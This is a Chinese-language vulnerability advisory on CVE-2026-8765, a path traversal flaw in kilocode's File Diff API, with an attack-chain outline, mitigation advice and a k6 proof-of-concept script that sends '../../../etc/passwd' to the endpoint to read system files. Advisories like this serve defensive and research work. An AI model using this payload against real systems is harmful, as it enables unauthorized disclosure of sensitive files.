CVE-2026-8765 CVSS 4.3 中危

CVE-2026-8765 kilocode路径遍历漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8765

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kilo-Org kilocode

漏洞概述

CVE-2026-8765是Kilo-Org kilocode 7.0.47及以下版本中的一个路径遍历漏洞。该漏洞影响File Diff API Endpoint组件中的Bun.file函数，位于packages/opencode/src/kilocode/review/worktree-diff.ts文件。攻击者可以通过操纵File参数进行路径遍历攻击，导致敏感文件泄露。该漏洞可远程利用，需要低权限，且厂商尚未回应。

技术细节

该漏洞位于Kilo-Org kilocode的File Diff API Endpoint组件中，具体文件为packages/opencode/src/kilocode/review/worktree-diff.ts。漏洞产生原因是Bun.file函数在处理File参数时未进行充分的输入验证和路径规范化，导致攻击者可以通过构造特殊的文件路径参数（如../）来访问预期目录之外的文件。攻击者可以利用此漏洞读取服务器上的敏感文件，如配置文件、源代码或其他敏感数据。由于CVSS评分为4.3，该漏洞的主要影响是机密性泄露，不会影响系统的完整性和可用性。攻击需要低权限用户，但无需用户交互即可远程发起攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行Kilo-Org kilocode 7.0.47或更低版本，并找到File Diff API Endpoint的访问端点

STEP 2

访问获取

攻击者获取低权限账户，或使用匿名访问（如果允许）

STEP 3

漏洞利用

攻击者构造包含路径遍历序列（如../）的恶意File参数，发送到File Diff API Endpoint

STEP 4

数据泄露

由于Bun.file函数未正确验证路径，系统返回请求的敏感文件内容

STEP 5

信息收集

攻击者分析泄露的文件内容，获取敏感信息用于后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-8765 - Path Traversal in kilocode
// This PoC demonstrates how to exploit the path traversal vulnerability
// in the File Diff API Endpoint

import http from 'k6/http';
import { check } from 'k6';

export default function () {
    // Target URL
    const baseUrl = 'http://target-server:port';
    
    // Exploit payload with path traversal
    const maliciousFile = '../../../etc/passwd';
    
    // Construct the request
    const payload = {
        file: maliciousFile
    };
    
    // Send the request to the vulnerable endpoint
    const response = http.post(`${baseUrl}/api/diff`, JSON.stringify(payload), {
        headers: { 'Content-Type': 'application/json' },
    });
    
    // Check if the exploit was successful
    check(response, {
        'status is 200': (r) => r.status === 200,
        'file content leaked': (r) => r.body.includes('root:') || r.body.includes('bin/bash'),
    });
}

影响范围

Kilo-Org kilocode <= 7.0.47

防御指南

临时缓解措施

在厂商发布补丁之前，建议禁用File Diff API Endpoint或限制其访问权限。实施Web应用防火墙(WAF)规则以检测和阻止包含路径遍历序列的请求。对服务器日志进行监控，检测异常的文件访问行为。限制API端点的网络访问，仅允许受信任的IP地址访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8765
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8765
3 Details https://www.cvedetails.com/cve/CVE-2026-8765/
4 VulDB https://vuldb.com/cve/CVE-2026-8765
5 Link https://gist.github.com/YLChen-007/1770f4530b0c933dc61f15b02aa0629d
6 Link https://vuldb.com/submit/811401
7 Link https://vuldb.com/vuln/364390
8 Link https://vuldb.com/vuln/364390/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表